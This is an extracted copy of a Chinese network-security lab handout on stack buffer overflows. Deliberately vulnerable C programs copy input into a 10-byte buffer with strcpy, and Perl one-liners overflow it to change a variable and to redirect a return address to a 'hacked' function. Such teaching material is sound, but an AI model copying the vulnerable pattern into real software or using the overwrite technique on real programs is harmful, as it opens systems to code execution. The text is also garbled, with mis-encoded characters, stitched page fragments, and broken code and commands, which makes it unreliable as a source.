網(wǎng)絡(luò)安全實驗二

1、.實驗二棧溢出實驗【實驗內(nèi)容】利用棧溢出修改變量值利用棧溢出修改函數(shù)返回地址，運行惡意代碼【實驗類型】驗證型實驗【實驗學(xué)時】 3 學(xué)時【實驗原理】如果向棧上聲明的緩沖區(qū)中復(fù)制數(shù)據(jù)，但是復(fù)制到數(shù)據(jù)量又比緩沖區(qū)大的時候，就會發(fā)生棧溢出。在棧上聲明的各種變量的位置緊臨函數(shù)調(diào)用程序的返回地址。 若用戶輸入的數(shù)據(jù)未經(jīng)驗證就傳遞給 strcpy 這樣的函數(shù)， 則會導(dǎo)致變量值被攻擊者指定的值所改寫或調(diào)用函數(shù)的返回地址將被攻擊者選擇的地址所覆蓋，打亂程序正常運行流程，轉(zhuǎn)而執(zhí)行惡意代碼。防范棧溢出的有效方法有： 禁止棧執(zhí)行， 從而阻止攻擊者植入惡意代碼； 編寫安全可靠的代碼，始終對輸入的內(nèi)容進行驗證；利用編譯器

2、的邊界檢查實現(xiàn)棧保護?！緦嶒灜h(huán)境】Linux 實驗臺 (CentOS)gcc 和 gdb 工具【實驗步驟】打開 Linux 實驗臺，輸入用戶名和口令，進入系統(tǒng)。一、 修改變量值(1)新建 stackover1.c文件： touchstackover1.c ；(2)編輯 stackover1.c文件： vimstackover1.c ，按 i 鍵進如編輯模式， 輸入示例程序1，按 Esc 鍵退出編輯模式，進入命令行，輸入 :wq 保存并退出文件編輯，上述過程如圖和圖所示；1 / 8.(3) 查看編輯結(jié)果：catstackover1.c ，如圖所示；(4) 生成可執(zhí)行文件：gccstackover

3、1.costackover1 ；(5) 運行執(zhí)行文件： ./ stackover1 ABCDE，執(zhí)行結(jié)果如圖3.5.3-10 所示；2 / 8.從結(jié)果中可以看出，x 的值為程序中的設(shè)定值10；(6) 在內(nèi)存中 x 緊鄰 buf ，所以輸入11 個字符制造棧緩沖區(qū)溢出，以修改x 所在地址空間的值： ./ stackover1 ABCDEFGHIJK，運行結(jié)果如圖所示；x 的值為 75，對應(yīng) K 的 ASCII 碼， x 的值發(fā)生改變；(7) 利用 perl 命令輸入適當(dāng)?shù)淖址?，?x 的值修改為任意指定的值，如修改為 30，十六進制為 0x1e：./ stackover1 perle prin

4、t“A”x1e0”.，“運行結(jié)果如圖所示；x 的值為 30，修改成功。示例程序 1 ：#include <stdio.h>#include <string.h>void function(char * str)char buf10;int x=10;strcpy(buf,str);printf("x=%dn",x);int main(int argc,char * argv)function(argv1);return 0;二、 修改函數(shù)返回地址，運行惡意代碼(1) 參照上述步驟， 新建 stackover2.c 文件，輸入示例程序 2，生成可執(zhí)行文

5、件 stackover2；(2) 運行可執(zhí)行文件并查看結(jié)果：./ stackover2 AAAAA ，結(jié)果如圖所示；3 / 8.從結(jié)果中可以看出程序運行的棧情況，foo 函數(shù)的返回地址位于第7 個位置上， bar的函數(shù)入口地址為0x08048421 ；(3) 隨意輸入多個字符制造棧溢出：./ stackover2 perl e print“，A”行運x25結(jié)果如圖所示；(4) 構(gòu)造輸入字符串，將第7 個位置修改為bar 函數(shù)入口地址，即修改foo 函數(shù)的返回地址為 bar 函數(shù)的入口地址，以修改程序運行流程：./ stackover2 perl e print “ A” x14 . “ x08

6、 ”，運行結(jié)果如圖所示；4 / 8.bar 函數(shù)運行，打印出“Hi!You ve been hacked!”，攻擊成功。通常我們無法獲取函數(shù)的地址和程序運行時棧的情況， 需要通過反編譯來查看變量地址或函數(shù)的入口地址，通過深入理解程序運行時的內(nèi)存分配來計算函數(shù)返回地址在內(nèi)存中的位置，以便達到修改程序運行流程、執(zhí)行惡意代碼的目的示例程序 2#include <stdio.h>#include <string.h>void foo(const char *input)char buf10;printf("My stack looks like:n%p n%p n%p

7、 n%p n%p n%p n%p n%p n n"); strcpy(buf,input);printf("%sn",buf);printf("Now the stack looks like:n%p n%p n%p n%p n%p n%p n%p n%p n n");void bar(void)printf("Hi!You've been hacked!n");int main(int argc,char *argv)printf("Address of foo=%p n",foo);print

8、f("Address of bar=%p n",bar);foo(argv1);return 0;【實驗思考】嘗試分析并畫出上述程序的棧結(jié)構(gòu)，可借助gdb 命令；嘗試在 Windows 環(huán)境下進行上述實驗，并分析與Linux 環(huán)境下的異同；根據(jù)程序運行時的內(nèi)存分配原理計算函數(shù)的返回地址；以示例程序3 為例，通過計算快速實現(xiàn) nevercalled 函數(shù)的運行。示例程序 3#include <stdio.h>#include <string.h>void nevercalled()printf("never calledn");exit(0);void functioncalled(char *